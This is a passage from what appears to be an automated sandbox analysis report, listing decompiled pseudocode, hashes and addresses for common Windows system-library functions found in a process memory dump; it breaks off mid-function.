Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d4fc28237854f7be7d8c0e20c200d0aa73da7bee0332bfcb52ca831a9a7119
Instruction ID: 87dcb0db5d482a672cd4e83e7fc863ad84bdfcde602db49c4b1da0a58fe8189a
Opcode Fuzzy Hash: 83d4fc28237854f7be7d8c0e20c200d0aa73da7bee0332bfcb52ca831a9a7119
Instruction Fuzzy Hash: 1901F4B3A112018FE3288F24ED80F257BB9EF41725F25416AE1018B791D7B4EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05094015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05094015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04FE2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04FE2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x50b86ac);
					E04FCF900(0x50b86d4, _t28);
					E04FDFFB0(0x50b86ac, _t28, 0x50b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04FDFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0509401a
0x0509401e
0x05094023
0x05094028
0x05094029
0x0509402b
0x0509402f
0x05094043
0x05094046
0x05094051
0x05094057
0x0509405f
0x05094062
0x05094067
0x0509406f
0x0509407c
0x0509407c
0x0509408c
0x0509408c
0x05094097

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891884e764013d9e41838748f42388287177dc27cb54a287c543e081b47ccd5e
Instruction ID: 7652717f40c3c8edb3fc26684c8f1e3412706e1cf3d384ed2b2dacda7333a130
Opcode Fuzzy Hash: 891884e764013d9e41838748f42388287177dc27cb54a287c543e081b47ccd5e
Instruction Fuzzy Hash: 5E01F7722015457FE618BB79DD80E27B7ECFF45654B000225F50887A21DB74FC12C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 050814FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E050814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x50bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0500FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04FE7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0500B640(E05009AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x050814fb
0x050814fb
0x0508150a
0x05081514
0x05081519
0x0508151b
0x05081526
0x0508152c
0x05081534
0x05081537
0x0508153a
0x05081545
0x05081557
0x05081547
0x05081550
0x05081550
0x05081562
0x05081563
0x05081565
0x0508156a
0x0508157f

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b499e0061316b612d0cb2251816519e15d5152f06698ae901b2f240d5e12e5
Instruction ID: b483f826d19f002a95f25c1b60deec2462b5ed9f55527b835f98fae308b7fcf2
Opcode Fuzzy Hash: c9b499e0061316b612d0cb2251816519e15d5152f06698ae901b2f240d5e12e5
Instruction Fuzzy Hash: B9019271A00258EFDB10EF69E845EEEBBB8EF45700F004066F905EB280DA74DA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0508138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0508138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x50bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0500FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04FE7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0500B640(E05009AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0508138a
0x0508138a
0x05081399
0x050813a3
0x050813a8
0x050813aa
0x050813b5
0x050813bb
0x050813c3
0x050813c6
0x050813c9
0x050813d4
0x050813e6
0x050813d6
0x050813df
0x050813df
0x050813f1
0x050813f2
0x050813f4
0x050813f9
0x0508140e

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cbe9ad4346ea1b15853688e012483408b53c2d24b6370e91c971d04d0c90086
Instruction ID: a5cfc14238494773b276f3432b38a9cfe110a845a96034a27760114b06131677
Opcode Fuzzy Hash: 3cbe9ad4346ea1b15853688e012483408b53c2d24b6370e91c971d04d0c90086
Instruction Fuzzy Hash: F3015271E04218AFDB14EFA9E845FAEBBB8EF45710F004066B905EB281DA74DA01C794

Uniqueness

Uniqueness Score: -1.00%

Function 04FC58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04FC58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x50bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4fa5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04FC5943() != 0 &&  *0x50b5320 > 5) {
					E05047B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05047B5E( &_v28, _t28);
					_t11 = E05047B9C(0x50b5320, 0x4fabf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0500B640(_t11, _t17, _v8 ^ _t29, 0x4fabf15, _t27, _t28);
			}

0x04fc58fb
0x04fc58fe
0x04fc5906
0x04fc590a
0x04fc593c
0x04fc593c
0x04fc590c
0x04fc590c
0x04fc5911
0x00000000
0x04fc5913
0x04fc5913
0x04fc5913
0x04fc5911
0x04fc591d
0x05021035
0x0502103c
0x0502103f
0x05021056
0x05021056
0x04fc593b

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107111ad168b30774ab74f08c6eb5453ead87a169425db25cdaabf2f782559b1
Instruction ID: 8eefbdae65309d0707eb6cb21c063a8f214bf643b43c0af73caceb68caec4e89
Opcode Fuzzy Hash: 107111ad168b30774ab74f08c6eb5453ead87a169425db25cdaabf2f782559b1
Instruction Fuzzy Hash: 0001D4B2B00115BBE714DE34ED44AEE77A8EF90620F4401A9A90597640EF20FD03C690

Uniqueness

Uniqueness Score: -1.00%

Function 0507FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0507FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x50bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0500FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04FE7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0500B640(E05009AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0507fe3f
0x0507fe3f
0x0507fe4e
0x0507fe58
0x0507fe5d
0x0507fe5f
0x0507fe6a
0x0507fe72
0x0507fe75
0x0507fe78
0x0507fe83
0x0507fe95
0x0507fe85
0x0507fe8e
0x0507fe8e
0x0507fea0
0x0507fea1
0x0507fea3
0x0507fea8
0x0507febd

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a30d93d26e5e6617a018929afabdf8edfb344c7a8760bf5df4a450353531619
Instruction ID: b638fe6c873ff0f1ee447e2e4fb2509a20d806d92c9fdb6f495f2f808d52e66b
Opcode Fuzzy Hash: 3a30d93d26e5e6617a018929afabdf8edfb344c7a8760bf5df4a450353531619
Instruction Fuzzy Hash: F6018471E0421DABDB14DFA9E845FAEBBB8EF44700F004066B900EB281DA74E901C795

Uniqueness

Uniqueness Score: -1.00%

Function 0507FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0507FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x50bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0500FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04FE7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0500B640(E05009AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0507fec0
0x0507fec0
0x0507fecf
0x0507fed9
0x0507fede
0x0507fee0
0x0507feeb
0x0507fef3
0x0507fef6
0x0507fef9
0x0507ff04
0x0507ff16
0x0507ff06
0x0507ff0f
0x0507ff0f
0x0507ff21
0x0507ff22
0x0507ff24
0x0507ff29
0x0507ff3e

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a1c2dcef0a69b56301e75217d9e35bb4712bc57b9ca7f6ad120d0169dbc3542
Instruction ID: fbaf6876acc0883e9b7204c421008ed031d5383e1e9ea1b70c9a8475df4c15cb
Opcode Fuzzy Hash: 7a1c2dcef0a69b56301e75217d9e35bb4712bc57b9ca7f6ad120d0169dbc3542
Instruction Fuzzy Hash: 5E018471E0025DABDB14DBA9E846FAEBBB8EF45700F004066B901EB281DA74DA01C794

Uniqueness

Uniqueness Score: -1.00%

Function 04FDB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FDB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04FE7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05047016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x04fdb037
0x04fdb039
0x04fdb03b
0x04fdb040
0x0502a60e
0x00000000
0x00000000
0x0502a61d
0x04fdb04b
0x04fdb04e
0x0502a627
0x0502a634
0x00000000
0x00000000
0x0502a641
0x0502a653
0x0502a643
0x0502a64c
0x0502a64c
0x0502a65b
0x00000000
0x00000000
0x00000000
0x0502a66c
0x04fdb057
0x04fdb057
0x04fdb057
0x04fdb046
0x04fdb046
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 36c3d3356cbc43a078562a732f97fd2caa65923f2c17224b6cf676739cca2c81
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 7A017C72705984DFD322CB1DD98CF7A77D9EB45B50F0A40A1E919CBA51EB68EC41C620

Uniqueness

Uniqueness Score: -1.00%

Function 05091074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05091074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0509165E(__ebx, 0x50b8ae4, (__edx -  *0x50b8b04 >> 0x14) + (__edx -  *0x50b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x50b8b04 >> 0x14) + (__edx -  *0x50b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0508AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04FE7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0507FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x05091074
0x05091080
0x05091082
0x0509108a
0x0509108f
0x05091093
0x050910ab
0x050910ab
0x050910c3
0x050910cf
0x050910e1
0x050910d1
0x050910da
0x050910da
0x050910e9
0x050910f5
0x050910f5
0x050910fe

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefabfe3ae134c16cb5fbe6fec206be587eb516c52abb6e0e5d97593d552d2c8
Instruction ID: db3222dda1f430ae6b5bd0f608d7638cbf87e4512ab8cbf6547365a122a41e87
Opcode Fuzzy Hash: eefabfe3ae134c16cb5fbe6fec206be587eb516c52abb6e0e5d97593d552d2c8
Instruction Fuzzy Hash: 9A0164727083429BCB14EF28E844B5E77E9BFC0210F00CA29F88283294EE71D841DB92

Uniqueness

Uniqueness Score: -1.00%

Function 05098ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05098ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x50bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04FE7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0500B640(E05009AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x05098ed6
0x05098ee5
0x05098eed
0x05098ef0
0x05098efa
0x05098f03
0x05098f0c
0x05098f15
0x05098f24
0x05098f27
0x05098f31
0x05098f43
0x05098f33
0x05098f3c
0x05098f3c
0x05098f4e
0x05098f4f
0x05098f51
0x05098f56
0x05098f69

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 799044d3c90f6f2124fa9fecf2075c0c5dbcc2aa6a462ae0e515fa3fe491f6ef
Instruction ID: 238505074e77a703a50bed0abdf0abe22e161edf98c8d938eac3c58463f941c3
Opcode Fuzzy Hash: 799044d3c90f6f2124fa9fecf2075c0c5dbcc2aa6a462ae0e515fa3fe491f6ef
Instruction Fuzzy Hash: 31111E70A042199FDB04DFA9D445BAEFBF4FF08300F0442AAE919EB382E634D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05098A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05098A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x50bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04FE7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0500B640(E05009AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x05098a62
0x05098a71
0x05098a79
0x05098a82
0x05098a85
0x05098a89
0x05098a8c
0x05098a8f
0x05098a92
0x05098a95
0x05098a9f
0x05098ab1
0x05098aa1
0x05098aaa
0x05098aaa
0x05098abc
0x05098abd
0x05098abf
0x05098ac4
0x05098ada

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304069cd02eef249ac215e192eaf8ec168f540e87af25465a037c21f0aabbb7f
Instruction ID: 5efb9f2c28b4d1d5c48d83d8c8f57316d7af6f057117b5dd2248918e6fa06af2
Opcode Fuzzy Hash: 304069cd02eef249ac215e192eaf8ec168f540e87af25465a037c21f0aabbb7f
Instruction Fuzzy Hash: FE011A72A0021CAFDB04DFA9E9459EEBBB8EF59710F10405AF905E7381DA34E9018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04FCDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FCDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04FCDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04FCE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04FCE8B0(__ecx, _t14, 0xfff);
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x04fcdb64
0x04fcdb66
0x04fcdb6b
0x04fcdbaa
0x04fcdb71
0x04fcdb76
0x04fcdb7a
0x04fcdba3
0x04fcdb7c
0x04fcdb87
0x04fcdb8b
0x05024fa1
0x05024fb3
0x05024fb8
0x04fcdb91
0x04fcdb96
0x04fcdb98
0x04fcdb98
0x04fcdb8b
0x04fcdb7a
0x04fcdb9d
0x04fcdba2

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 9f5f963da032f36a11709749dd5180a6d1a73bf719fb6b2b8299025c05cce4b1
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: D2F0F6336456239BE7726A558EC0F2FB6A58FC1A64F16003DF1099B344CB60AC0396E4

Uniqueness

Uniqueness Score: -1.00%

Function 04FCB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FCB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04FE7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04FE7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05047016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x04fcb1e8
0x04fcb1ea
0x04fcb1f3
0x05024a17
0x04fcb1f9
0x04fcb1f9
0x04fcb1f9
0x04fcb201
0x05024a21
0x05024a2e
0x00000000
0x00000000
0x05024a3b
0x05024a4d
0x05024a3d
0x05024a46
0x05024a46
0x05024a55
0x00000000
0x00000000
0x00000000
0x04fcb20a
0x04fcb20a
0x04fcb20a
0x04fcb20a

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 1af64532924d963dd3a8465594faff1f1f865d83cf5bd2687b654cbaf2dc41e3
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: DC01D136600684DBD7229759E904FAD7BD9EF51754F0800A6FD148B6B1E679E801C214

Uniqueness

Uniqueness Score: -1.00%

Function 0505FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0505FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x50bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04FE7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0500B640(E05009AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0505fe96
0x0505fe9e
0x0505fea1
0x0505fead
0x0505feb3
0x0505feb9
0x0505fec3
0x0505fed5
0x0505fec5
0x0505fece
0x0505fece
0x0505fee0
0x0505fee1
0x0505fee3
0x0505fee8
0x0505fefb

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ea14106bc4c4d9999bdb93998f1306a1ccc564c626520da9c1fd04d1be36c1
Instruction ID: 5cd33ed31b9fbc18906216cb4d23b8a32aef017a422dbdf0a7fb2931f9dbdcf5
Opcode Fuzzy Hash: 47ea14106bc4c4d9999bdb93998f1306a1ccc564c626520da9c1fd04d1be36c1
Instruction Fuzzy Hash: 28018670A0420DEFDB14DFA8E546AAEB7F4FF04304F144169B905DB382DA39E902CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05098F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05098F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
